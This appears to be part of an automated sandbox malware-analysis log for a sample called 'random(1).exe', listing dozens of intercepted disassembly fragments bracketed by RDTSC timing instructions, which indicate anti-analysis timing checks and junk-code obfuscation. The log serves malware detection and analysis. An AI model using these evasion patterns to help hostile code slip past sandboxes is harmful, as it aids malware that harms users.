              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E22A2 second address: 10E22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E255E second address: 10E2562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E2562 second address: 10E259A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jnc 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jnc 00007F06D851855Dh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26C7 second address: 10E26E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D8B4D9C6h 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F06D8B4D9CCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26E9 second address: 10E26EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E26EF second address: 10E26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBD1 second address: 10EBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007F06D8518546h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBF3 second address: 10EBBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EBBFB second address: 10EBC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E9B6D second address: 10E9B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E9B72 second address: 10E9B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F06D8518546h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EA0E7 second address: 10EA131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F06D8B4D9D7h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F06D8B4D9C6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jng 00007F06D8B4D9C6h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EA47B second address: 10EA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F06D8518556h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EAD00 second address: 10EAD05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB27F second address: 10EB2A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8518551h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D851854Eh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB2A4 second address: 10EB2AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8A0 second address: 10EB8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F06D8518546h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8B0 second address: 10EB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8BC second address: 10EB8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EB8C2 second address: 10EB8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EFBC7 second address: 10EFBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EFBCB second address: 10EFBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEE5A second address: 10EEE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFCD second address: 10EEFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFE7 second address: 10EEFED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EEFED second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF169 second address: 10EF16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF2A5 second address: 10EF2CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9DBh 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d jo 00007F06D8B4D9C6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jne 00007F06D8B4D9CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF6E5 second address: 10EF6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF6EB second address: 10EF6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF84C second address: 10EF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF852 second address: 10EF87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F06D8B4D9D3h 0x0000000e jmp 00007F06D8B4D9CEh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF87B second address: 10EF881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF881 second address: 10EF887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF887 second address: 10EF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10EF88B second address: 10EF8AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F06D8B4D9D2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10F465B second address: 10F4660 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10F4660 second address: 10F4696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F06D8B4D9D9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FAA6D second address: 10FAA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F06D8518546h 0x0000000b jmp 00007F06D8518559h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FB1BF second address: 10FB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007F06D8B4D9C6h 0x0000000c jp 00007F06D8B4D9C6h 0x00000012 jmp 00007F06D8B4D9D7h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FC591 second address: 10FC5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FA455 second address: 10FA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10FA45B second address: 10FA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jp 00007F06D8518546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11038D0 second address: 11038DA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1110AF7 second address: 1110B12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F06D851855Dh 0x00000008 jmp 00007F06D8518551h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11106AC second address: 11106B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11106B1 second address: 11106C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8518546h 0x0000000a je 00007F06D8518546h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1046E17 second address: 1046E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8B4D9D1h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1046E03 second address: 1046E17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F06D8518548h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F56 second address: 1113F6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F06D8B4D9D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F6D second address: 1113F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1113F75 second address: 1113F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B328 second address: 111B347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518559h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B347 second address: 111B355 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111B355 second address: 111B35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F057 second address: 111F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F05D second address: 111F076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F06D8518546h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F076 second address: 111F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 111F07A second address: 111F07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 112131C second address: 1121328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1121328 second address: 1121337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1131059 second address: 113105F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113105F second address: 1131065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11311B7 second address: 11311DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11311DF second address: 11311EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F06D8518546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314ED second address: 11314F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314F1 second address: 11314F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11314F5 second address: 113152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F06D8B4D9D2h 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 jns 00007F06D8B4D9C6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113152A second address: 113153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D851854Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113153C second address: 113154E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F06D8B4D9E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1132194 second address: 1132198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 113460C second address: 1134616 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1143BB8 second address: 1143BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F06D8518546h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115693E second address: 115694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115694C second address: 1156970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F06D8518559h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1156970 second address: 1156974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1156974 second address: 115697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11564F0 second address: 11564F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11564F4 second address: 115651E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518559h 0x00000007 jo 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 115651E second address: 1156527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B074 second address: 116B078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B32A second address: 116B32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B4DD second address: 116B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8518546h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B4E8 second address: 116B501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B987 second address: 116B98B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116B98B second address: 116B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BAF7 second address: 116BAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BAFF second address: 116BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b jmp 00007F06D8B4D9D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BB22 second address: 116BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 116BB28 second address: 116BB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11704A8 second address: 11704F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F06D8518548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jnp 00007F06D8518546h 0x00000028 push 00000004h 0x0000002a xor dword ptr [ebp+12482B69h], eax 0x00000030 call 00007F06D8518549h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jno 00007F06D8518546h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11704F6 second address: 11704FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 11704FC second address: 117052D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F06D8518550h 0x0000000f jnc 00007F06D8518548h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F06D8518550h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 117052D second address: 117053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 117053A second address: 1170541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1170541 second address: 1170571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
